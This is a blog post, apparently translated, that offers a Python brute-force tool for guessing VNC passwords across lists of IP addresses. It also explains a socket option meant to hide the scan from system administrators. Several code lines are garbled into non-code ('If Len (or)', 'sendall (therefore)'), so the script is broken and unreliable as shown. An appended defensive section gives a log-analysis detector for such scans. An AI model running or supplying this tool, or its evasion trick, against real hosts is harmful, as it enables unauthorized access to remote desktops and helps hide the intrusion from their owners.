Sunday, 29 November 2015

[RST] VNC Brute Force Tool [Python]




First, let me explain a problem common to most open-source pen-testing programs.
Many, if not all, use blocking sockets. This means that if you open a connection to IP X and, for whatever reason, it does not answer, the connection stays open until a) the program is terminated or b) the system default timeout is reached, which is usually huge. Hydra, Medusa, ncrack and nmap's vnc-brute.nse all have the same problem. To some extent they were designed poorly; when you test on your own network, this problem does not show up. So we use non-blocking sockets. This means that if a defined number of seconds passes and we get no response, we close the connection. I set it to 25 seconds, but you can change it in the source if needed.


Code:
import socket, struct
from Crypto.Cipher import DES
from sys import exc_info, exit, version_info, maxint
import sys
import Queue, threading
bad = open('bad.txt','w')
valid = open('valid.txt','a')
err = open('error.txt','w')
cracked = []
try:
 with open('valid.txt','rU') as vf: valids = vf.read().splitlines()
 for val in valids:
  h1 = val.split(" ")[0]
  cracked.append(h1)
except:
 pass
  
queue = Queue.Queue(maxsize=4000)
with open('ips.txt','rU') as ipf: hosts = ipf.read().splitlines()
with open('pass.txt','rU') as pf: passwords = pf.read().splitlines()
ThreadNmber = int(sys.argv[1])
Verbose = str(sys.argv[2])

def gen_key(key):
 try:
  newkey = []
  for ki in range(len(key)):
   bsrc = ord(key[ki])
   btgt = 0
   for i in range(8):
    if bsrc & (1 << i):
     btgt = btgt | (1 << 7-i)
   newkey.append(btgt)

  if version_info[0] == 2:
   return ''.join(chr(c) for c in newkey)
  else:
   return bytes(newkey)
 except:
  pass

   
class VNCBrute(threading.Thread):
  def __init__(self, queue):
  threading.Thread.__init__(self)
  self.queue = queue
  
 def run(self):
  while True:
   host,passwd = self.queue.get()
   self.checker(host,passwd)
   self.queue.task_done()
 
 def checker(self,host,password):
  try:
   if host in cracked: return False
   
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.setblocking(0)
   s.settimeout (25)
   s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
   
   s.connect((host,5900))
   resp = s.recv (99)
   
   version = resp[:11].decode('ascii')
   If Len (or)> 12: 
    s.close()
    return False
   
   major, minor = version[6], version[10]
   if (major, minor) in [('3', '8'), ('4', '1')]: proto = b'RFB 003.008\n'
   elif (major, minor) == ('3', '7'): proto = b'RFB 003.007\n'
   else: proto = b'RFB 003.003\n'
   
   s.sendall (therefore)
   resp = s.recv (99)
   
   if minor in ('7', '8'):
    code = ord(resp[0:1])
    if code == 0: 
     s.close()
     return False 
    s.sendall(b'\x02')
    resp = s.recv (99)
   else:
    code = ord(resp[3:4])
    if code != 2: 
     s.close()
     return False
    resp = or [-16:]
   
   If Len (or)! = 16: 
    s.close()
    return False
   
   sys.stdout.write("\r[+]Trying "+host+' '+password+'                                                      ')
   sys.stdout.flush()
   pw = password.ljust (8, '\ x00') [8]
   key = gen_key(pw)
   
   des = DES.new(key, DES.MODE_ECB)
   enc = des.encrypt(resp)
   
   s.sendall(enc)
   resp = s.recv (99)
   
   code = ord(resp[3:4])
   mesg = resp[8:].decode('ascii', 'ignore')
   
   if code == 1:
    if Verbose == 'v':
     bad.write(host+'\n')
     bad.flush()
    s.close()
   Elif code == 0:
    valid.write(host+' '+password+'\n')
    valid.flush()
    cracked.append(host)
    print '\rOWNED!!! '+' '+host+' '+password,'                                                                      '
    s.close()
   else: 
    s.close()
    return False
  except Exception, e: 
   err.write(host+'\n')
   err.flush()
   pass
 
 
def main():
 try:
  i = 0
  for i in range(ThreadNmber):
   t = VNCBrute(queue)
   t.daemon = True
   t.start()
   i += 1
 except Exception, e:
  print 'Stopped at',i,'Threads'
  sys.exit()
 print i,'Threads spawned'
 
 for password in passwords:
  for host in hosts:
   queue.put((host,password))
   
 queue.join()


print '[+] VNC Brute Force Tool'
print '[+] Author: Elohim ' 
main()
There is one option that I think is interesting.
Let's say we do not want to make too much noise when running the program on another server. A sysadmin who looks at the number of connections will be horrified (or there may be an alarm that triggers when the number of outgoing connections exceeds a certain limit),
so I used

Code:
setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
That means that once we close the connection, the socket, instead of entering the TIME_WAIT state and staying there for 120 s as is the default on most systems, is closed abruptly and disappears from netstat.
It is also helpful when there is a limit on the number of ephemeral ports that can be used (rarely).

Usage:


Code:
python vnc.py 100 v/no
Where:
100 = number of threads. Tested with up to 1,400 threads; it runs flawlessly if the internet connection allows.
v / no = If you pass v and use only one username and password, bad.txt will contain ONLY the IPs that actually run VNC software and on which authentication was not successful.

Why is it useful? I discussed this issue briefly for a similar script for WordPress. In short, it removes IPs that have nothing to do with VNC but happen to have port 5900 open. If you pass no, this filtering is not done. It only needs to be done once; afterwards, reuse the IPs from bad.txt.

If you have questions, do not hesitate to ask. I'm sick of seeing people sell such scripts. I assure you there is nothing another program can offer beyond what is presented here. It covers absolutely all requirements for speed and efficiency. Do not spend money on nonsense; buy the kids milk instead =) Enjoy!

PS: If anyone wants to discuss RFB and the issue of VNC servers that also ask for a username, I look forward to discussing it.
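The abortive close set with SO_LINGER above keeps sockets out of netstat's TIME_WAIT list, but every such close still sends a TCP RST, and connection logs keep the record. An added example, not part of the original post: a defender-side check over a reduced Zeek conn.log layout that flags sources fanning out to port 5900 and reports how many of their connections ended with an originator reset. The sample rows, addresses, function name and thresholds are constructed assumptions.

```python
from collections import defaultdict

# Constructed sample rows in a reduced Zeek conn.log layout:
# ts, id.orig_h, id.orig_p, id.resp_h, id.resp_p, conn_state
SAMPLE_ROWS = [
    ("1448790000.10", "10.0.0.23", "40112", "198.51.100.7", "5900", "RSTO"),
    ("1448790001.30", "10.0.0.23", "40113", "198.51.100.8", "5900", "RSTO"),
    ("1448790002.05", "10.0.0.23", "40114", "198.51.100.9", "5900", "S0"),
    ("1448790003.40", "10.0.0.23", "40115", "203.0.113.15", "5900", "RSTO"),
    ("1448790004.90", "10.0.0.23", "40116", "203.0.113.16", "5900", "RSTO"),
    ("1448790005.00", "10.0.0.23", "40117", "203.0.113.20", "443", "SF"),
    ("1448790010.00", "10.0.0.40", "51000", "10.0.0.5", "5900", "SF"),
    ("1448793600.00", "10.0.0.40", "51044", "10.0.0.5", "5900", "SF"),
]
SAMPLE_LOG = "\n".join("\t".join(row) for row in SAMPLE_ROWS)

# Zeek conn_state values meaning the originator aborted with a RST
RESET_STATES = {"RSTO", "RSTOS0"}


def flag_vnc_fanout(log, port=5900, window=60.0, min_targets=4):
    """Flag sources that reach min_targets distinct hosts on `port`
    within any `window` seconds; report their originator-reset ratio."""
    per_src = defaultdict(list)
    for line in log.splitlines():
        if not line or line.startswith("#"):
            continue  # skip blank lines and Zeek header lines
        ts, src, _sport, dst, dport, state = line.split("\t")
        if int(dport) == port:
            per_src[src].append((float(ts), dst, state))

    flagged = {}
    for src, events in per_src.items():
        events.sort()
        best = 0
        for i, (start, _, _) in enumerate(events):
            # distinct destinations contacted within `window` of this event
            targets = {d for t, d, _ in events[i:] if t - start <= window}
            best = max(best, len(targets))
        if best >= min_targets:
            resets = sum(1 for _, _, s in events if s in RESET_STATES)
            flagged[src] = {"max_targets": best,
                            "reset_ratio": round(resets / len(events), 2)}
    return flagged


if __name__ == "__main__":
    print(flag_vnc_fanout(SAMPLE_LOG))
```

Because the count comes from per-connection records rather than a snapshot of open sockets, the short socket lifetime does not hide the fan-out.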
